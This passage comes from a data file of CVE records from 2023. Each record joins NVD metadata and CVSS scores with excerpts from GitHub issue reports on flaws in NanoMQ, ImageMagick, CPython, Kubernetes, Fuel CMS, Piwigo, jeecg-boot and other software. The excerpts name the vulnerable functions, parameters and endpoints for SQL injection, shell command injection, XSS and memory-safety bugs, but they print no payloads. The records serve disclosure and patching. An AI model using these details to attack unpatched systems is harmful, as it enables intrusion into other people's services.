"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List"
],
"url": "https://github.com/emqx/nanomq/issues/1164"
},
{
"source": "cve@mitre.org",
"ta... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"770"
] | 770 | https://github.com/emqx/nanomq/issues/1165#issuecomment-1515667127 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
Our team (School of Cyber Science and Technology, Shandong University)have found the a potential issue in the current version of nanomq,it may cause heap-use-after-free when it handles the publish messages
**Expected behavior**
We use ASAN to compile the target server, and when we send a larg... | [Security]: wrong protocol name & data racing | https://api.github.com/repos/nanomq/nanomq/issues/1165/comments | 13 | 2023-04-14T17:23:19Z | 2023-04-25T10:06:34Z | https://github.com/nanomq/nanomq/issues/1165 | 1,668,648,319 | 1,165 |
CVE-2023-34151 | 2023-05-30T22:15:11.000 | A vulnerability was found in ImageMagick. This security flaw ouccers as an undefined behaviors of casting double to size_t in svg, mvg and other coders (recurring bugs of CVE-2022-32546). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34151"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603",
"versionEndExcluding": "7.1.1-11",
"versionEndIncluding": null,
"versionS... | [
"190"
] | 190 | https://github.com/ImageMagick/ImageMagick/issues/6341 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.30-0
### Operating system
Linux
### Operating system, version and so on
Any
### Description
While reviewing historical vulnerabilities, I discovered several similar bugs just like issue #4985 which was later assigned CVE-2022-32546.
The original vulnerability relates ... | Undefined behaviors of casting `double` to `size_t` in svg, mvg and other coders (recurring bugs of CVE-2022-32546) | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6341/comments | 32 | 2023-05-17T11:25:22Z | 2024-05-13T17:50:37Z | https://github.com/ImageMagick/ImageMagick/issues/6341 | 1,713,682,055 | 6,341 |
CVE-2023-34152 | 2023-05-30T22:15:11.070 | A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34152"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603",
"versionEndExcluding": "7.1.1-11",
"versionEndIncluding": null,
"versionS... | [
"78"
] | 78 | https://github.com/ImageMagick/ImageMagick/issues/6339 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
6.9.6-4
### Operating system
Linux
### Operating system, version and so on
Any
### Description
While reviewing historical vulnerabilities, I discovered an aribitary code execution vulnerability (shell command injection) in `OpenBlob`, which is actually an incomplete fix to C... | RCE (shell command injection) vulnerability in `OpenBlob` with `--enable-pipes` configured | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6339/comments | 11 | 2023-05-17T09:47:04Z | 2024-11-08T13:49:11Z | https://github.com/ImageMagick/ImageMagick/issues/6339 | 1,713,528,731 | 6,339 |
CVE-2023-34153 | 2023-05-30T22:15:11.143 | A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34153"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210660"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603",
"versionEndExcluding": "7.1.1-11",
"versionEndIncluding": null,
"versionS... | [
"77"
] | 77 | https://github.com/ImageMagick/ImageMagick/issues/6338 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.0-1
### Operating system
Linux
### Operating system, version and so on
Any
### Description
In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29... | Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6338/comments | 2 | 2023-05-17T08:50:05Z | 2024-01-23T11:25:13Z | https://github.com/ImageMagick/ImageMagick/issues/6338 | 1,713,432,787 | 6,338 |
CVE-2023-33659 | 2023-06-06T12:15:09.503 | A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nmq_subinfo_decode() in the file mqtt_parser.c. An attacker could exploit this vulnerability to cause a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/emqx/nanomq/issues/1154"
},
{
"s... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"787"
] | 787 | https://github.com/emqx/nanomq/issues/1154 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed SUBSCRIBE messages.
This vulnerability is different from https://github.com/emqx/nanomq/issues/1153
**Expected behavior**
If Asan is enabled at compile t... | heap-buffer-overflow2 in NanoMQ | https://api.github.com/repos/nanomq/nanomq/issues/1154/comments | 2 | 2023-04-12T09:21:09Z | 2023-04-19T06:43:53Z | https://github.com/nanomq/nanomq/issues/1154 | 1,664,179,606 | 1,154 |
CVE-2023-2878 | 2023-06-07T15:15:09.377 | Kubernetes secrets-store-csi-driver in versions before 1.3.3 discloses service account tokens in logs. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/118419"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/kubernetes-security-an... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:secrets-store-csi-driver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FE39B6E7-61B5-482B-953C-BA5441CD85C7",
"versionEndExcluding": "1.3.3",
"versionEndIncluding": null,
... | [
"532"
] | 532 | https://github.com/kubernetes/kubernetes/issues/118419 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | A security issue was discovered in [secrets-store-csi-driver](https://github.com/kubernetes-sigs/secrets-store-csi-driver) where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud ... | CVE-2023-2878: secrets-store-csi-driver discloses service account tokens in logs | https://api.github.com/repos/kubernetes/kubernetes/issues/118419/comments | 1 | 2023-06-02T19:03:54Z | 2023-06-02T19:04:34Z | https://github.com/kubernetes/kubernetes/issues/118419 | 1,738,671,677 | 118,419 |
CVE-2023-33595 | 2023-06-07T20:15:09.920 | CPython v3.12.0 alpha 7 was discovered to contain a heap use-after-free via the function ascii_decode at /Objects/unicodeobject.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/python/cpython/issues/103824"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/python/cpython/pull/103993/commits/c120bc2d354c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:3.12.0:alpha7:*:*:*:*:*:*",
"matchCriteriaId": "BA2D7BE3-5AEE-42DC-892C-747202C4A542",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"416"
] | 416 | https://github.com/python/cpython/issues/103824 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"python",
"cpython"
] | # Your environment
- CPython versions tested on: 3.12.0 alpha 7
- Operating system and architecture: ubuntu20.04.1,x86_64
- Compiler flags: clang with ASAN and UBSAN instrument
# Bug description
The AddressSanitizer (ASAN) tool has detected multiple heap-use-after-free errors and a segmentation fault (SEGV) in... | Found Heap-use-after-free errors and SEGV in Python | https://api.github.com/repos/python/cpython/issues/103824/comments | 9 | 2023-04-25T03:35:53Z | 2023-07-13T10:14:24Z | https://github.com/python/cpython/issues/103824 | 1,682,372,017 | 103,824 |
CVE-2023-33658 | 2023-06-08T12:15:09.240 | A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nni_msg_get_pub_pid() in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/emqx/nanomq/issues/1153"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"787"
] | 787 | https://github.com/emqx/nanomq/issues/1153 | [
"Exploit"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed PUBLISH messages.
**Expected behavior**
If Asan is enabled at compile time, the NanoMQ crashes and displays ASAN information.
 in the file mqtt_parser.c. An attacker could exploit this vulnerability to cause a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/emqx/nanomq/issues/1155"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"787"
] | 787 | https://github.com/emqx/nanomq/issues/1155 | [
"Exploit"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed messages.
This vulnerability is different from https://github.com/emqx/nanomq/issues/1153 and https://github.com/emqx/nanomq/issues/1154
**Expected behavio... | heap-buffer-overflow3 in NanoMQ | https://api.github.com/repos/nanomq/nanomq/issues/1155/comments | 3 | 2023-04-12T09:29:05Z | 2023-04-14T10:11:32Z | https://github.com/nanomq/nanomq/issues/1155 | 1,664,192,034 | 1,155 |
CVE-2023-33657 | 2023-06-08T13:15:09.530 | A use-after-free vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nni_mqtt_msg_get_publish_property() in the file mqtt_msg.c. This vulnerability is caused by improper data tracing, and an attacker could exploit it to cause a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/emqx/nanomq/issues/1165#issue-1668648319"
},
{
"source": "cve@... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"416"
] | 416 | https://github.com/emqx/nanomq/issues/1165#issue-1668648319 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
Our team (School of Cyber Science and Technology, Shandong University)have found the a potential issue in the current version of nanomq,it may cause heap-use-after-free when it handles the publish messages
**Expected behavior**
We use ASAN to compile the target server, and when we send a larg... | [Security]: wrong protocol name & data racing | https://api.github.com/repos/nanomq/nanomq/issues/1165/comments | 13 | 2023-04-14T17:23:19Z | 2023-04-25T10:06:34Z | https://github.com/nanomq/nanomq/issues/1165 | 1,668,648,319 | 1,165 |
CVE-2023-33557 | 2023-06-09T18:15:09.693 | Fuel CMS v1.5.2 was discovered to contain a SQL injection vulnerability via the id parameter at /controllers/Blocks.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bcvgh/fuel-cms-sqlinjection/blob/main/README.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url":... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | [
"89"
] | 89 | https://github.com/daylightstudio/FUEL-CMS/issues/604 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | login required.
fuel/modules/fuel/controllers/Blocks.php
line 64 import_view method starts
Line 70 receives the id parameter of the post request and enters the import method

fuel/modules/fuel/librari... | FUEL CMS 1.5.2 allows SQL Injection via parameter 'id' in fuel/modules/fuel/controllers/Blocks.php | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/604/comments | 2 | 2023-05-12T02:24:19Z | 2023-05-12T15:50:17Z | https://github.com/daylightstudio/FUEL-CMS/issues/604 | 1,706,820,945 | 604 |
CVE-2023-33492 | 2023-06-12T13:15:10.300 | EyouCMS 1.6.2 is vulnerable to Cross Site Scripting (XSS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/42"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/weng-xianhu/eyoucms/issues/42 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting



<img width="666" alt="image" src="https://user-images.githubusercontent... | [Security]: data contention in pipe reaper | https://api.github.com/repos/nanomq/nanomq/issues/1180/comments | 4 | 2023-04-18T15:56:32Z | 2023-05-18T03:03:09Z | https://github.com/nanomq/nanomq/issues/1180 | 1,673,423,197 | 1,180 |
CVE-2023-33695 | 2023-06-13T16:15:13.077 | Hutool v5.8.17 and below was discovered to contain an information disclosure vulnerability via the File.createTempFile() function at /core/io/FileUtil.java. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/3103"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracki... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C24D3772-507E-4835-B431-E55F9FB9EDD0",
"versionEndExcluding": null,
"versionEndIncluding": "5.8.17",
"versionStartExcludin... | [
"732"
] | 732 | https://github.com/dromara/hutool/issues/3103 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"dromara",
"hutool"
] | There may has a temporary file information disclosure vulnerability by use File.createTempFile().
https://github.com/dromara/hutool/blob/89832cdcce8dc3b6bed0fc1d5bdd33e36d1e599f/hutool-core/src/main/java/cn/hutool/core/io/FileUtil.java#L1007
Preamble
----------------------------------------------------------------... | Temporary File Information Disclosure Vulnerability | https://api.github.com/repos/chinabugotech/hutool/issues/3103/comments | 1 | 2023-05-15T06:30:47Z | 2023-05-15T12:25:34Z | https://github.com/chinabugotech/hutool/issues/3103 | 1,709,406,655 | 3,103 |
CVE-2023-34867 | 2023-06-14T16:15:20.277 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5084 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5084/comments | 0 | 2023-06-05T11:59:55Z | 2023-06-05T11:59:55Z | https://github.com/jerryscript-project/jerryscript/issues/5084 | 1,741,623,530 | 5,084 |
CVE-2023-34868 | 2023-06-14T16:15:20.323 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5083"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5083 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5083/comments | 0 | 2023-05-31T12:11:34Z | 2023-05-31T12:11:34Z | https://github.com/jerryscript-project/jerryscript/issues/5083 | 1,734,082,739 | 5,083 |
CVE-2023-34626 | 2023-06-15T16:15:09.347 | Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1924"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4B9AEE3-C9C5-4D20-BA38-9E5A2A64FABD",
"versionEndExcluding": null,
"versionEndIncluding": "13.7.0",
"versionStartExcludin... | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1924 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Access the 'Users' function and use the filter function

Observe the request on Burp Suite

Manipulate the 'order' or 'e... | SQL Injection in the "Users" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1924/comments | 0 | 2023-05-25T07:54:09Z | 2023-05-29T10:27:38Z | https://github.com/Piwigo/Piwigo/issues/1924 | 1,725,285,095 | 1,924 |
CVE-2023-2431 | 2023-06-16T08:15:08.770 | A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This b... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.4,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityI... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/118690"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/QHmx0HOQ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59A9CBF2-B94B-4311-AE41-6CEA2DA7E24B",
"versionEndExcluding": "1.24.14",
"versionEndIncluding": null,
"versionStar... | [
"1287"
] | 1287 | https://github.com/kubernetes/kubernetes/issues/118690 | [
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | ### What happened?
A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. This issue has been rated LOW ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N)) (score: 3.4).
If you have... | CVE-2023-2431: Bypass of seccomp profile enforcement | https://api.github.com/repos/kubernetes/kubernetes/issues/118690/comments | 6 | 2023-06-15T14:42:32Z | 2023-09-29T21:16:18Z | https://github.com/kubernetes/kubernetes/issues/118690 | 1,758,988,605 | 118,690 |
CVE-2023-34659 | 2023-06-16T18:15:09.437 | jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4976"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"89"
